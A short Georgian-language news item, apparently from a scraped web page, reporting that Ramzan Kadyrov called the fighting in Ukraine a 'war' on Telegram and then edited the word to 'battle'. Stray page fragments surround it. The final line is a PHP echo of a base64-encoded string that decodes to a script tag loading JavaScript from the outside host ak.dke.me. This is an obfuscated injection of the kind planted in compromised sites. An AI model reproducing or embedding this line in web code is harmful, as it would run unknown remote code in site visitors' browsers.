celsiusi
ავერსი შნაიდერი
ჩეჩნეთის რესპუბლიკის მეთაურმა, რამზან კადიროვმა ტელეგრამის არხში ინფორმაციის გავრცელების დროს დაუფიქრებლად დაწერა, რომ უკრაინაში ომია. 
 
Unian-ის ცნობით, კადიროვი მალევე მიხვდა, რომ გაუაზრებლად გამოიყენა "აკრძალული სიტყვა – ომი", რადგან რუსულიმა მხარემ უკრაინის ომს "სპეციალური ოპერაცია" უწოდა და გამოქვეყნებული ტექსტი სასწრაფოდ დააკორექტირა.
 
კერძოდ, კი მან უკრაინის წინააღმდეგ საბრძოლველად გაგზავნილი კადიროველების სამედიცინო დახმარებაზე ისაუბრა, მათივე კოლოსალური დანაკარგების გამართლებას შეეცადა, რა დროსაც დაწერა, რომ "ომი მსხვერპლის გარეშე არ ხდება" მოგვიანებით კი "ომი" წაშალა და დაწერა – "ბრძოლა მსხვერპლის გარეშე არ ხდება". თუმცა, მისი ტექსტის პირვანდელი ვარიანტი ტელეგრამის არხმა "კათარზისმა" გამოაქვეყნა. 
 
 
2037
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");